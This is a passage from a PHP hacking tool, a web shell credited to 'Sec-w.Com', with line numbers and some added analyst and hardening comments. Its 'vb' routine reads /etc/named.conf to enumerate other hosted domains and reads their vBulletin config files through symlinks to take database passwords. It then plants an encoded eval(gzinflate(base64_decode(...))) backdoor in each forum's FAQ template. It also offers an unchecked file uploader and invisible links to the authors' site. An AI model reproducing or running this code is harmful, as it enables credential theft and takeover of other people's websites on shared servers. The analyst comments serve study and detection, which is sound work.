  1145. }
  1146. }
  1147. }
  1148. }
  1149.  
  1150.  
  1151. break;
  1152.  
  1153.  
  1154. case 'vb':
  1155.  
  1156.  
  1157. if(isset($_POST['s'])){
  1158.  
  1159.  
  1160.  
  1161. $file = @file_get_contents('vb.txt');
  1162.  
  1163. $ex = explode("\n",$file);
  1164.  
  1165. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1166.  
  1167.  
  1168. foreach ($ex as $exp){
  1169.  
  1170. $es = explode("||",$exp);
  1171.  
  1172. $config = $es[0];
  1173.  
  1174. $domin = $es[1];
  1175.  
  1176. $domins = trim($domin).'';
  1177.  
  1178. $readconfig = @file_get_contents(trim($config));
  1179.  
  1180. if(ereg('vBulletin',$readconfig)){
  1181.  
  1182.  
  1183.  
  1184. $db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  1185.  
  1186. $userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
  1187.  
  1188. $pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  1189.  
  1190. $con = @mysql_connect('localhost',$userdb,$pass);
  1191.  
  1192. $db = @mysql_select_db($db,$con);
  1193.  
  1194. $shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
  1195.  
  1196. $crypt = "{\${eval(gzinflate(base64_decode(\'";
  1197.  
  1198. $crypt .= "$shell";
  1199.  
  1200. $crypt .= "\')))}}{\${exit()}}</textarea>";
  1201.  
  1202. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  1203.  
  1204. $query = @mysql_query($sqlfaq,$con);
  1205.  
  1206.  
  1207.  
  1208. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  1209.  
  1210. else
  1211.  
  1212. {
  1213.  
  1214. $r = '<b style="color:red">failed</b>';
  1215.  
  1216. }
  1217.  
  1218. $domins = trim($domin).'';
  1219.  
  1220. echo "<tr>
  1221. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1222. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1223.  
  1224.  
  1225.  
  1226.  
  1227.  
  1228.  
  1229.  
  1230. }else{
  1231.  
  1232. echo "<tr>
  1233. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1234. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1235. }
  1236.  
  1237. }
  1238.  
  1239.  
  1240.  
  1241.  
  1242.  
  1243.  
  1244.  
  1245.  
  1246.  
  1247.  
  1248. die();
  1249.  
  1250. }
  1251.  
  1252. if(!is_file('named.txt')){
  1253.  
  1254. $d00m = file("/etc/named.conf");
  1255.  
  1256. }else{
  1257.  
  1258. $d00m = file("named.txt");
  1259.  
  1260.  
  1261. }
  1262. if(!$d00m)
  1263. {
  1264.  
  1265. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1266. }
  1267. else
  1268.  
  1269. {
  1270. echo "<div class='tmp'>
  1271. <form method='POST' action='$pg?sws=vb'>
  1272. <input type='submit' value='Inject shell' />
  1273. <input type='hidden' value='1' name='s' />
  1274. </form>
  1275. <br /><br />
  1276. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1277.  
  1278. $f = fopen('vb.txt','w');
  1279.  
  1280. foreach($d00m as $dom){
  1281.  
  1282. if(eregi("zone",$dom)){
  1283.  
  1284. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1285.  
  1286. if(strlen(trim($domsws[1][0])) > 2){
  1287.  
  1288. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1289.  
  1290. ///////////////////////////////////////////////////////////////////////////////////
  1291.  
  1292. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
  1293. $wpp=get_headers($wpl);
  1294. $wp=$wpp[0];
  1295.  
  1296. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
  1297. $wpp2=get_headers($wp2);
  1298. $wp12=$wpp2[0];
  1299.  
  1300. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
  1301. $wpp3=get_headers($wp3);
  1302. $wp13=$wpp3[0];
  1303.  
  1304.  
  1305. ////////// vb ////////////
  1306.  
  1307. $pos = strpos($wp, "200");
  1308. $config="&nbsp;";
  1309.  
  1310. if (strpos($wp, "200") == true )
  1311. {
  1312. $config= $wpl;
  1313. }
  1314. elseif (strpos($wp12, "200") == true)
  1315. {
  1316. $config= $wp2;
  1317. }
  1318. elseif (strpos($wp13, "200") == true)
  1319. {
  1320. $config= $wp3;
  1321. }
  1322. else
  1323. {
  1324. continue;
  1325.  
  1326. }
  1327. flush();
  1328.  
  1329. /////////////////////////////////////////////////////////////////////////////////////
  1330.  
  1331. $dom = $domsws[1][0];
  1332.  
  1333. $w = fwrite($f,"$config||$dom \n");
  1334. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1335.  
  1336.  
  1337. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1338. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1339.  
  1340.  
  1341.  
  1342.  
  1343.  
  1344. flush();
  1345.  
  1346.  
  1347. }
  1348. }
  1349. }
  1350. }
  1351.  
  1352.  
  1353.  
  1354.  
  1355.  
  1356.  
  1357.  
  1358.  
  1359. break;
  1360.  
  1361. case 'help': // self-check page: prints a table of the PHP settings and functions this script depends on
  1362. // Analyst note: every check in this case is read-only; "True" in the output means the condition favours the tool.
  1363. echo "<div class='tmp'>
  1364. <table align='center' width='40%'><td>function</td><td>Case</td>";
  1365.  
  1366. // safe_mode is read from the ini settings; the row shows "False" when it is enabled.
  1367. $safe_mode = ini_get('safe_mode');
  1368. if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: red'>False</b>";}
  1369.  
  1370. echo "<tr><td>Safe Mode</td><td>$r</td>";
  1371. // function_exists() reports false for built-ins blocked through disable_functions, so a "False" row below typically means that function is disabled on the host.
  1372. $fun = function_exists('symlink');
  1373. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1374.  
  1375. echo "<tr><td>function symlink</td><td>$r</td>";
  1376.  
  1377.  
  1378. $fun = function_exists('file');
  1379. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1380.  
  1381. echo "<tr><td>function file</td><td>$r</td>";
  1382.  
  1383. $fun = function_exists('file_get_contents');
  1384. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1385.  
  1386. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  1387.  
  1388. $fun = function_exists('mkdir');
  1389. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1390.  
  1391. echo "<tr><td>function mkdir</td><td>$r</td>";
  1392.  
  1393. // is_dir() only tests that sym/root exists relative to the script; the "Permission denied" label is the tool's own wording. sym/root is presumably created elsewhere in the file - not visible in this excerpt.
  1394. $fun = is_dir('sym/root');
  1395. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1396.  
  1397. echo "<tr><td>Permission denied</td><td>$r</td>";
  1398.  
  1399. // NOTE(review): `X or !X` is always true, so preg_match() is handed a boolean rather than the file contents; this row therefore always prints "True" and says nothing about the host.
  1400. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
  1401. if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  1402.  
  1403. echo "<tr><td>Forbidden</td><td>$r</td>";
  1404.  
  1405.  
  1406. // Hardening note: listing symlink in disable_functions makes the "function symlink" row False; on Apache, SymLinksIfOwnerMatch (rather than FollowSymLinks) is the usual control against cross-account symlink reads.
  1407.  
  1408. echo "</table></div>";
  1409.  
  1410.  
  1411.  
  1412. break;
  1413. default: // any selector value without its own case lands here
  1414. header("Location: $pg"); // redirects to $pg, which is set outside this excerpt; NOTE(review): markup is echoed earlier in the file, so without output buffering this header is probably never sent
  1415.  
  1416.  
  1417.  
  1418.  
  1419. }
  1420.  
  1421.  
  1422. /// home ///
  1423. }else
  1424. {
  1425.  
  1426.  
  1427. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; // upload form; the empty action posts back to the script's own URL
  1428. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1429. if( $_POST['_upl'] == "Upload" ) { // the only condition visible here is the submit button's value
  1430. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; } // stores the upload under the client-supplied file name, as a relative path; no extension, type or path check, and @ hides any warning
  1431. else { echo '<br /><br />Not uploaded !!<br><br>'; }
  1432. // Detection note: the request is a multipart/form-data POST carrying a file part named "file" and a field _upl=Upload.
  1433. // Triage note: any file created through this branch should be treated as attacker-controlled content.
  1434. }
  1435.  
  1436. echo '
  1437. <br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
  1438. <br /><br />
  1439. <b style="color: red";> Sec-w.Com </b>
  1440. <br /><br />
  1441. Muslims Hackers</div> ';
  1442.  
  1443. }
  1444.  
  1445.  
  1446. function ex($text,$a,$b){ // returns the part of $text after the first $a, cut at the next $b (or the next $a, or the end of the text)
  1447. $explode = explode($a,$text); // index 1 is the segment that follows the first occurrence of $a
  1448. $explode = explode($b,$explode[1]); // $explode[1] is undefined when $a does not occur in $text; error_reporting(0) at the top of the file hides the notice
  1449. return $explode[0]; // no call to ex() is visible in this excerpt
  1450. }
  1451.  
  1452.  
  1453.  
  1454. echo '</div>
  1455.  
  1456. <a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>
  1457.  
  1458. <a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>
  1459.  
  1460.  
  1461.  
  1462. </body>
  1463.  
  1464. </html>
  1465. '; // closes the page; both anchors are coloured #F4F4F4, the same value the stylesheet gives the body background, so the links are invisible when rendered. Their ??? text is mis-encoded in this paste.
  1466.  
  1467. ?>